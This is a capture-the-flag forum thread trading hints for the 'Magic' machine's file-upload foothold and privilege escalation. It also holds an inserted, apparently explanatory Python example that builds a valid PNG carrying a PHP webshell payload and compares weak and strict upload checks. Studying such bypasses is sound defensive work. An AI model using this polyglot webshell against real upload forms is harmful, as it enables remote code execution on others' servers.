Magic

Had some trouble with root but in the end made it. Shout out to all the people who helped me, thanks a ton guys :slight_smile:. Open for hints :slight_smile:

Stuck with the upload form; tried different approaches (using just magic, concatenating two files) but can't get RCE, let alone a reverse shell! A nudge would be appreciated :frowning:

@federella said:

Stuck with the upload form; tried different approaches (using just magic, concatenating two files) but can't get RCE, let alone a reverse shell! A nudge would be appreciated :frowning:

You can get a good example of how to bypass this by googling what you are trying to do and going to a gitbook page.

Ideally you want to be uploading an actual valid image.

This was a very fun machine, there are a lot of good hints here. I have a couple more below:

Foothold: OWASP Top 10 and hide something in plain sight

User: If at first you don't succeed, try again with something you already know

Root: You can sometimes trick a system into looking at something it shouldnā€™t

PM me if you need any hints


Hi all.

Got user quite easily. There are at least two solutions to get in :slight_smile:
Lovely box.

But I need some hint about root.

As I see, gdb is present. Do we need to look in this direction?

Also, we have one +s file, which is allowed for our group.

Is this ok?

Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.

In my local setup the solution is already found, but, as always, not on the server)

Done. Was really struggling with the root part for some hours because I misunderstood how that whole thing worked.

Very nice box!

@swagcat228 said:

Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.

In my local setup the solution is already found, but, as always, not on the server)

You might be overthinking this. You don't need to RE anything for this box. Have a look at what it's doing and see if you can meddle with it.

#Maybe an issue?
Hi, I'm stuck with the upload of the image… I tried every way to upload my rev, but even if I upload a clean image, I always get the "alert" about the png, jpg extension.

Anyone same issue??

Hi all. Working on root. When trying to upgrade the shell, it seems I am now getting an error that won't allow /bin/sh commands. Is anyone having that problem, or does anyone know how I might be able to get around it? This was not an issue for the last few days.

Root Dance - learned an interesting method regarding the uploading.

Hello,

Could I have a hint on the initial foothold?
I can upload a file that contains PHP code, but I haven't found a way to make it end with an executable extension. (Null bytes, double extension, content-type didn't work.)

I haven't found any PHP file that does inclusion and would allow an RCE by including the image with PHP code.

I have also tried to include PHP instructions directly in the page, since quotes aren't filtered in the filename, but it didn't work either.

I am a bit lost about the direction I should take.

Obviously, I find what I am looking for just after asking for help.
Search for the OWASP documentation about file upload. There are some strange configurations about what gets executed on a server.
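To make the upload hints above concrete (the "upload an actual valid image" advice earlier in the thread and the OWASP file-upload pointer just above), here is an added example in Python. It is not code from the box or from any poster; it shows why a check on the leading magic bytes alone is weak, why a structurally valid image can still carry a PHP payload, and what a server has to do instead (validate the final extension, reject handler extensions hidden in the middle of the name, parse the whole file, and rebuild it from its critical chunks). The payload, the 1x1 PNG, the filenames and the list of handler extensions are all constructed for the example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SIG = b"\xff\xd8\xff"

# Constructed payload: the kind of one-liner that gets hidden inside an image.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"

# Assumed set of extensions a misconfigured handler (e.g. an AddHandler that
# matches the extension anywhere in the name) would pass to the PHP engine.
HANDLER_EXTS = {"php", "phtml", "phar", "php3", "php4", "php5"}
ALLOWED_EXT = {"png"}


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_polyglot_png(payload: bytes = PHP_PAYLOAD) -> bytes:
    """Build a fully valid 1x1 RGB PNG that carries `payload` in an ancillary tEXt chunk.

    Image viewers render it as a normal (red) pixel; a PHP interpreter handed
    the same bytes ignores the binary around the payload and executes it.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, depth, RGB
    scanline = b"\x00" + b"\xff\x00\x00"                   # filter byte + one red pixel
    text = b"Comment\x00" + payload                         # tEXt: keyword NUL text
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", zlib.compress(scanline)) + png_chunk(b"IEND", b""))


def magic_only_check(data: bytes) -> bool:
    """The weak check: trusts the first few bytes and nothing else."""
    return data.startswith(PNG_SIG) or data.startswith(JPEG_SIG)


def parse_png_chunks(data: bytes):
    """Yield (type, body) for every chunk; raise ValueError on any structural fault."""
    if not data.startswith(PNG_SIG):
        raise ValueError("bad signature")
    pos = len(PNG_SIG)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError("truncated chunk")
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != struct.unpack(">I", crc_bytes)[0]:
            raise ValueError("bad CRC in " + ctype.decode("latin-1"))
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            if pos != len(data):
                raise ValueError("trailing data after IEND")   # concatenated file
            return
    raise ValueError("missing IEND")


def strict_check(filename: str, data: bytes) -> bool:
    """Final extension must be allowed, no handler extension hidden in the name,
    and the whole file must parse as a PNG whose first chunk is IHDR."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXT:
        return False
    if any(p in HANDLER_EXTS for p in parts[1:-1]):        # e.g. shell.php.png
        return False
    try:
        chunks = list(parse_png_chunks(data))
    except ValueError:
        return False
    return chunks[0][0] == b"IHDR"


def sanitize_png(data: bytes) -> bytes:
    """Rebuild the image from its critical chunks only, dropping tEXt and other
    ancillary chunks where a payload can ride along in an otherwise valid file."""
    keep = (b"IHDR", b"PLTE", b"IDAT", b"IEND")
    return PNG_SIG + b"".join(png_chunk(t, b) for t, b in parse_png_chunks(data) if t in keep)


if __name__ == "__main__":
    polyglot = build_polyglot_png()
    print("magic-only accepts polyglot:", magic_only_check(polyglot))
    print("strict accepts shell.png:", strict_check("shell.png", polyglot))
    print("strict accepts shell.php.png:", strict_check("shell.php.png", polyglot))
    print("payload survives sanitize:", PHP_PAYLOAD in sanitize_png(polyglot))
```

The order of the results is the point: the magic-bytes check passes both a valid image with an embedded payload and a bare signature followed by PHP; the strict check rejects the concatenated file and the double extension but still accepts the well-formed polyglot, because a valid image is exactly what the hint says to upload. Only rebuilding the file (and storing uploads outside any path the PHP handler serves) removes the payload.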

stuck on www-root :confused:

And root! Great box from start to finish.

Happy to answer messages for hints.

I totally agree, I also enjoyed the box and had fun. Thanks.

Sanity check, someone please? I may be in a rabbit hole trying to root… DM if possible

ROOTED.

Learned a lot on this one! Thanks @TRX

Incredibly satisfying box for me. Although the frustration at getting the initial foothold was maddening, the moment you realize how to get it will give satisfaction in awesome waves ;). Root was very routine I think. The user part was really great. Thank you for this box.